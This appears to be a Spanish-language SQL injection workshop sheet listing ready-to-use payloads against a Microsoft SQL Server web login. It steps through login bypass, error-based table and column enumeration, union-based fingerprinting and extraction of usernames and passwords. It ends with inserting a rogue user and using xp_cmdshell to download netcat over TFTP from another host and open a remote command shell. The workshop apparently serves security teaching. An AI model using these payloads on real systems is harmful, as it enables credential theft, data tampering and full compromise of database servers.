IP WORKSHOP ASISTENTES: http://10.0.18.254/


#
# SQL Injection - Real Hack Exhibition
# ------------------------------------

# DEMO: Identificación
# --------------------

'

# DEMO: Salteando la Autenticación
# --------------------------------

admin'--
'OR''=''--

# DEMO: Obteniendo Información: Enumeración de Tablas
# ---------------------------------------------------

'having 1=1--

# DEMO: Obteniendo Información: Enumeración de Campos
# ---------------------------------------------------

'group by users.userid having 1=1--
'group by users.userid, users.username having 1=1--
'group by users.userid, users.username, users.userpass having 1=1--
'group by users.userid, users.username, users.userpass, users.firstname having 1=1--
'group by users.userid, users.username, users.userpass, users.firstname, users.lastname having 1=1--


# DEMO: Obteniendo Información: Tipo de Dato
# ------------------------------------------

'union select sum(firstname) from users--
'union select sum(userid) from users--


# DEMO: Obteniendo Información: @@version
# ---------------------------------------

'union select @@version--
'union select @@version,1--
'union select @@version,1,1--
'union select @@version,1,1,1--
'union select @@version,1,1,1,1--

'union select @@servername,1,1,1,1--

'union select @@language,1,1,1,1--

'union select @@servicename,1,1,1,1--


# DEMO: Lectura de Datos: Nombre de Usuario y Contraseña
# ------------------------------------------------------

'union select min(username),1,1,1,1 from users where username > 'a'--
'union select min(username),1,1,1,1 from users where username > 'b'--

'union select min(userpass),1,1,1,1 from users where username = 'admin'--
'union select min(userpass),1,1,1,1 from users where username = 'support'--


# DEMO: Lectura de Datos: Table Browsing / HTTP Proxy
# ---------------------------------------------------

'declare @aux varchar(8000) set @aux='' select @aux=@aux+username+'/'+userpass+';'from users where username>@aux select @aux as aux into tmp--
'union select aux,1,1,1,1 from tmp--
'drop table tmp--


# DEMO: Alterando Datos: INSERT
# -----------------------------

'insert into users values(9,'MyUser','MyPass','MyFName','MyLName')--


# DEMO: Control Total del Host: File Upload
# -----------------------------------------

'exec master.dbo.xp_cmdshell 'cmd /c tftp -i 172.16.1.196 get nc.exe c:\nc.exe'--
'exec master.dbo.xp_cmdshell 'cmd /c tftp -i 172.16.1.196 get whoami.exe c:\whoami.exe'--


'exec master.dbo.xp_cmdshell 'cmd /c c:\nc.exe -l -d -p 1234 -t -e cmd.exe'--